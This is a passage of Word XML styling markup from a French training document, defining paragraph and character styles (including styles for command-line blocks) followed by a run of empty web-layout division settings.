    <w:rsid w:val="005252BC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EF-chapitretitreCar">
    <w:name w:val="EF - chapitre titre Car"/>
    <w:basedOn w:val="ModuleCar"/>
    <w:link w:val="EF-chapitretitre"/>
    <w:locked/>
    <w:rsid w:val="0002154A"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4D4D4D"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFmoduletitre">
    <w:name w:val="EF module titre"/>
    <w:next w:val="EFtiquette"/>
    <w:link w:val="EFmoduletitreCar"/>
    <w:qFormat/>
    <w:rsid w:val="00290A72"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:after="360"/>
      <w:ind w:left="340" w:hanging="340"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0A9E97"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFtiquette">
    <w:name w:val="EF étiquette"/>
    <w:link w:val="EFtiquetteCar"/>
    <w:qFormat/>
    <w:rsid w:val="00171D5E"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="0" w:hanging="180"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EFmoduletitreCar">
    <w:name w:val="EF module titre Car"/>
    <w:basedOn w:val="ModuleCar"/>
    <w:link w:val="EFmoduletitre"/>
    <w:locked/>
    <w:rsid w:val="00290A72"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0A9E97"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFsoustiquette">
    <w:name w:val="EF sous étiquette"/>
    <w:basedOn w:val="Sous-fragment"/>
    <w:link w:val="EFsoustiquetteCar"/>
    <w:qFormat/>
    <w:rsid w:val="004C7458"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FragmentCar">
    <w:name w:val="Fragment Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Fragment"/>
    <w:locked/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EFtiquetteCar">
    <w:name w:val="EF étiquette Car"/>
    <w:basedOn w:val="FragmentCar"/>
    <w:link w:val="EFtiquette"/>
    <w:locked/>
    <w:rsid w:val="00171D5E"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFtextestandard">
    <w:name w:val="EF texte standard"/>
    <w:basedOn w:val="Textefragment"/>
    <w:link w:val="EFtextestandardCar"/>
    <w:qFormat/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Sous-fragmentCar">
    <w:name w:val="Sous-fragment Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Sous-fragment"/>
    <w:locked/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EFsoustiquetteCar">
    <w:name w:val="EF sous étiquette Car"/>
    <w:basedOn w:val="Sous-fragmentCar"/>
    <w:link w:val="EFsoustiquette"/>
    <w:locked/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextefragmentCar">
    <w:name w:val="Texte fragment Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Textefragment"/>
    <w:locked/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EFtextestandardCar">
    <w:name w:val="EF texte standard Car"/>
    <w:basedOn w:val="TextefragmentCar"/>
    <w:link w:val="EFtextestandard"/>
    <w:locked/>
    <w:rsid w:val="004C7458"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="660" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="880" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1100" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1320" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1540" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1760" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E875F3"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1980" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="EPMI-111">
    <w:name w:val="EPMI - 1.1.1."/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="EPMINchapitemodule">
    <w:name w:val="EPMI N° chapite + module"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CLI">
    <w:name w:val="CLI"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00A5676F"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="double" w:sz="4" w:space="1" w:color="548DD4" w:themeColor="text2" w:themeTint="99"/>
        <w:left w:val="double" w:sz="4" w:space="4" w:color="548DD4" w:themeColor="text2" w:themeTint="99"/>
        <w:bottom w:val="double" w:sz="4" w:space="1" w:color="548DD4" w:themeColor="text2" w:themeTint="99"/>
        <w:right w:val="double" w:sz="4" w:space="4" w:color="548DD4" w:themeColor="text2" w:themeTint="99"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PS">
    <w:name w:val="PS"/>
    <w:basedOn w:val="CLI"/>
    <w:next w:val="EFtextestandard"/>
    <w:qFormat/>
    <w:rsid w:val="0058266B"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C77FEB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB3C20"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00592BE8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00592BE8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00592BE8"/>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00321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FcouleurEasyFormer">
    <w:name w:val="EF couleur EasyFormer"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="EFtextestandard"/>
    <w:link w:val="EFcouleurEasyFormerCar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="008265C2"/>
    <w:pPr>
      <w:ind w:left="57"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="12A19B"/>
      <w:kern w:val="24"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EFcouleurEasyFormerCar">
    <w:name w:val="EF couleur EasyFormer Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="EFcouleurEasyFormer"/>
    <w:rsid w:val="008265C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="12A19B"/>
      <w:kern w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00891E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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PrformatHTMLCar">
    <w:name w:val="Préformaté HTML Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="PrformatHTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00891EA7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00891EA7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00A41EF2"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="r-jfrpv2">
    <w:name w:val="r-jfrpv2"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="007F66BC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00930EB0"/>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9775">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="7755472">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="174150527">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="504319516">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="730007483">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="736591271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="819735912">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1024020010">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1064449329">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1195774368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1238708167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1534347402">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1587378504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1619139104">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="187259791">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="270094236">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="308826292">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="341779244">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="389302753">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="615018360">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="820192575">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1396704609">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1651248703">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1755199462">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1797484529">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
